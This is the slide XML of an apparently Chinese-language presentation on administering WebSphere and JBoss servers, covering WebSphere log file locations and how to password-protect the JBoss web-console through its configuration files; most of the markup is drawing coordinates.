                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务器日志</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b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/opt/IBM/WebSphere/Plugins/logs/webserver1/http_plugin.log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10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>应用服务器日志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b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/opt/IBM/WebSphere/AppServer/profiles/&lt;profileName&gt;/logs/&lt;servername&gt;/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SystemOut.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SystemErr.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>应用服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JVM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>日志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9271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startServer.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stopServer.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>应用服务器启动和停止日志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92710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activity.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>历史事件日志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trace.log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r>
              <a:rPr sz="1600" spc="175" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular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输出的诊断</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trace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native_stdout.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>native_stderr.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>应用服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JVM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>调用操作系统的底层日志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2088" y="3811270"/>
            <a:ext cx="820419" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="820420" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="819911" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81991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972819" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="972819" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="972312" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97231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690" y="459473"/>
            <a:ext cx="394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Jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>的安全设置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972311" y="2028444"/>
            <a:ext cx="10668000" cy="370840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10668000" h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10668000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10668000" y="370331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3703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6889" y="2024252"/>
            <a:ext cx="10679430" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10679430" h="379094">
                <a:moveTo>
                  <a:pt x="10674121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52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376897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10674121" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067888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10678883" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10678655" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10677982" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10676928" y="377952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10675594" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10674121" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10679430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679430" h="379094">
                <a:moveTo>
                  <a:pt x="1066935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669358" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10669358" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10679430" h="379094">
                <a:moveTo>
                  <a:pt x="10669358" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10669358" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10674121" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10678883" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10678883" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10674121" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10669358" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10679430" h="379094">
                <a:moveTo>
                  <a:pt x="10678883" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10674121" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10669358" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10678883" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10678883" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10679430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10679430" h="379094">
                <a:moveTo>
                  <a:pt x="10669358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10669358" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10669358" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10679430" h="379094">
                <a:moveTo>
                  <a:pt x="10678883" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10669358" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10674121" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10678883" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10678883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311" y="2478023"/>
            <a:ext cx="10400030" cy="370840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10400030" h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399776" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399776" y="370331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="37033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6889" y="2473960"/>
            <a:ext cx="10409555" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10404500" y="378853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="378853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="377939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376885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10404500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1040926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10409262" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409021" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10408348" y="376885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10407294" y="377939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10405960" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555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379094">
                <a:moveTo>
                  <a:pt x="1039973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37" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10399737" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399737" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10409262" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10404500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555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10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10399737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10399737" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10409262" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399737" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262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2311" y="3006851"/>
            <a:ext cx="10400030" cy="2862580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10400030" h="2862579">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399776" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399776" y="2862072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="286207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6889" y="3001975"/>
            <a:ext cx="10409555" cy="2872105"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10409555" h="2872104">
                <a:moveTo>
                  <a:pt x="10404487" y="2871838"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2871838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2871609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="2870936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="2869882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2868549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104092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862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409021" y="2868549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10408348" y="2869882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10407294" y="2870936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10405960" y="2871609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="2871838"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="28721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2872104">
                <a:moveTo>
                  <a:pt x="103997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25" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2872104">
                <a:moveTo>
                  <a:pt x="10399725" y="2867075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="2867075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2872104">
                <a:moveTo>
                  <a:pt x="10409250" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10404487" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2872104">
                <a:moveTo>
                  <a:pt x="9525" y="2867075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2867075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2872104">
                <a:moveTo>
                  <a:pt x="10399725" y="2867075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="2867075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2872104">
                <a:moveTo>
                  <a:pt x="10409250" y="2867075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399725" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="28670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851" y="1597723"/>
            <a:ext cx="10786745" cy="419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web-console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密码的方法</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="422909">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1405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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、在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jboss-web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件中，去掉</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;security-domain&gt;java:/jaas/web-console&lt;/security-domain&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的注释</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="422909">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="138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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、在同上目录下的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web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件，去掉</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;security-constraint&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>部分的注释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42290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r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、打开</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>安装目录</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>“server”default“/conf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>下的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login-config.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件，找到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web-console</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="42290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&lt;application-policy name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"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web-console</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="7353934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&lt;authentication&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1248410" marR="2247265" indent="-1905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&lt;login-module </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>code="org.jboss.security.auth.spi.UsersRolesLoginModule"  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>flag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"required"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12484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&lt;module-option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name="usersProperties"&gt;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web-console-users.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/module-option&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12484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&lt;module-option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name="rolesProperties"&gt;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web-console-roles.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/module-option&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="10579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&lt;/login-module&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="7290434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&lt;/authentication&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="7341234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&lt;/application-policy&gt;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7140" y="3811270"/>
            <a:ext cx="784860" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="784859" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="784859" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="784859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07744" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1007744" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1007363" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1007363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363" y="2127504"/>
            <a:ext cx="10400030" cy="2308860"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10400030" h="2308860">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399776" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399776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2055" y="2122741"/>
            <a:ext cx="10409555" cy="2318385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10409555" h="2318385">
                <a:moveTo>
                  <a:pt x="10404500" y="2317851"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2317851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2317610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2316937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2315883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2314562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1040926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308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409021" y="2314562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10408348" y="2315883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10407294" y="2316937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10405973" y="2317610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="2317851"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="231838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2318385">
                <a:moveTo>
